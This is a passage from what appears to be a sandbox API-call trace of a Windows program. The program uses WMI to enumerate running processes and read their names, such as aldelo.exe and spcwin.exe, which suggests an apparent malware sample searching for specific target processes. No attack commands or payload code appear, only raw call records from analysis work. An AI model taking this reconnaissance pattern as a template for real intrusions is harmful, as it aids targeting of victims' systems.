wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.740] IWbemClassObject:Get (in: This=0x5713f10, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2276\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.741] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.741] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.741] IUnknown:Release (This=0x500344) returned 0x1 [0279.741] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x57163b0) returned 0x0 [0279.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x57163b0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.742] WbemDefPath:IClassFactory:CreateInstance (in: This=0x57163b0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57192b8) returned 0x0 [0279.742] WbemDefPath:IUnknown:Release (This=0x57163b0) returned 0x0 [0279.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x57192b8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x57192b8) returned 0x0 [0279.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x57192b8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.742] WbemDefPath:IUnknown:AddRef (This=0x57192b8) returned 0x3 [0279.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x57192b8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.742] WbemDefPath:IUnknown:QueryInterface (in: This=0x57192b8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.743] WbemDefPath:IUnknown:QueryInterface (in: This=0x57192b8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x57163c0) returned 0x0 [0279.743] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x57163c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.743] WbemDefPath:IUnknown:Release (This=0x57163c0) returned 0x3 [0279.743] WbemDefPath:IUnknown:QueryInterface (in: This=0x57192b8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.743] WbemDefPath:IUnknown:Release (This=0x57192b8) returned 0x2 [0279.743] WbemDefPath:IUnknown:Release (This=0x57192b8) returned 0x1 [0279.743] WbemDefPath:IUnknown:QueryInterface (in: This=0x57192b8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x57192b8) returned 0x0 [0279.744] WbemDefPath:IUnknown:AddRef (This=0x57192b8) returned 0x3 [0279.744] WbemDefPath:IUnknown:Release (This=0x57192b8) returned 0x2 [0279.744] WbemDefPath:IWbemPath:SetText (This=0x57192b8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2276\"") returned 0x0 [0279.744] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.744] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.744] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.744] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.744] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.744] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.744] IWbemClassObject:Get (in: This=0x5713f10, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d8d8c*=0, plFlavor=0x27d8d90*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="afr38.exe", varVal2=0x0), pType=0x27d8d8c*=8, plFlavor=0x27d8d90*=0) returned 0x0 [0279.744] IWbemClassObject:Get (in: This=0x5713f10, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d8d8c*=8, plFlavor=0x27d8d90*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="afr38.exe", varVal2=0x0), pType=0x27d8d8c*=8, plFlavor=0x27d8d90*=0) returned 0x0 [0279.744] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x57163f0, puReturned=0x27bb39c | out: apObjects=0x57163f0*=0x57140a8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.746] IMarshal:GetUnmarshalClass (in: This=0x57140ac, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.746] IUnknown:Release (This=0x57140ac) returned 0x3 [0279.746] IWbemClassObject:Get (in: This=0x57140a8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.746] IWbemClassObject:Get (in: This=0x57140a8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2256\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.747] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.747] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.747] IUnknown:Release (This=0x500344) returned 0x1 [0279.747] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x57163f0) returned 0x0 [0279.748] WbemDefPath:IUnknown:QueryInterface (in: This=0x57163f0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.748] WbemDefPath:IClassFactory:CreateInstance (in: This=0x57163f0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719398) returned 0x0 [0279.748] WbemDefPath:IUnknown:Release (This=0x57163f0) returned 0x0 [0279.748] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719398, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5719398) returned 0x0 [0279.748] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719398, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.748] WbemDefPath:IUnknown:AddRef (This=0x5719398) returned 0x3 [0279.748] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719398, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.748] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719398, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.749] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719398, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716400) returned 0x0 [0279.749] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716400, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.749] WbemDefPath:IUnknown:Release (This=0x5716400) returned 0x3 [0279.749] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719398, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.749] WbemDefPath:IUnknown:Release (This=0x5719398) returned 0x2 [0279.749] WbemDefPath:IUnknown:Release (This=0x5719398) returned 0x1 [0279.749] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719398, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5719398) returned 0x0 [0279.750] WbemDefPath:IUnknown:AddRef (This=0x5719398) returned 0x3 [0279.750] WbemDefPath:IUnknown:Release (This=0x5719398) returned 0x2 [0279.750] WbemDefPath:IWbemPath:SetText (This=0x5719398, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2256\"") returned 0x0 [0279.750] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.750] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.750] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.750] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.750] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.750] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.750] IWbemClassObject:Get (in: This=0x57140a8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d95f0*=0, plFlavor=0x27d95f4*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="aldelo.exe", varVal2=0x0), pType=0x27d95f0*=8, plFlavor=0x27d95f4*=0) returned 0x0 [0279.750] IWbemClassObject:Get (in: This=0x57140a8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d95f0*=8, plFlavor=0x27d95f4*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="aldelo.exe", varVal2=0x0), pType=0x27d95f0*=8, plFlavor=0x27d95f4*=0) returned 0x0 [0279.750] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x5716430, puReturned=0x27bb39c | out: apObjects=0x5716430*=0x571c848, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.752] IMarshal:GetUnmarshalClass (in: This=0x571c84c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.752] IUnknown:Release (This=0x571c84c) returned 0x3 [0279.752] IWbemClassObject:Get (in: This=0x571c848, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.753] IWbemClassObject:Get (in: This=0x571c848, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2600\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.753] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.753] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.753] IUnknown:Release (This=0x500344) returned 0x1 [0279.754] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x5716430) returned 0x0 [0279.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x5716430, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.754] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5716430, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719478) returned 0x0 [0279.754] WbemDefPath:IUnknown:Release (This=0x5716430) returned 0x0 [0279.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719478, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5719478) returned 0x0 [0279.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719478, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.754] WbemDefPath:IUnknown:AddRef (This=0x5719478) returned 0x3 [0279.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719478, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.755] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719478, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.755] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719478, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x571c448) returned 0x0 [0279.755] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c448, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.755] WbemDefPath:IUnknown:Release (This=0x571c448) returned 0x3 [0279.755] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719478, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.755] WbemDefPath:IUnknown:Release (This=0x5719478) returned 0x2 [0279.755] WbemDefPath:IUnknown:Release (This=0x5719478) returned 0x1 [0279.755] WbemDefPath:IUnknown:QueryInterface (in: This=0x5719478, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5719478) returned 0x0 [0279.756] WbemDefPath:IUnknown:AddRef (This=0x5719478) returned 0x3 [0279.756] WbemDefPath:IUnknown:Release (This=0x5719478) returned 0x2 [0279.756] WbemDefPath:IWbemPath:SetText (This=0x5719478, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2600\"") returned 0x0 [0279.756] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.756] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.756] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.756] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.757] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.757] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.757] IWbemClassObject:Get (in: This=0x571c848, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d9e5c*=0, plFlavor=0x27d9e60*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spcwin.exe", varVal2=0x0), pType=0x27d9e5c*=8, plFlavor=0x27d9e60*=0) returned 0x0 [0279.757] IWbemClassObject:Get (in: This=0x571c848, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d9e5c*=8, plFlavor=0x27d9e60*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="spcwin.exe", varVal2=0x0), pType=0x27d9e5c*=8, plFlavor=0x27d9e60*=0) returned 0x0 [0279.757] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c478, puReturned=0x27bb39c | out: apObjects=0x571c478*=0x571c9e0, 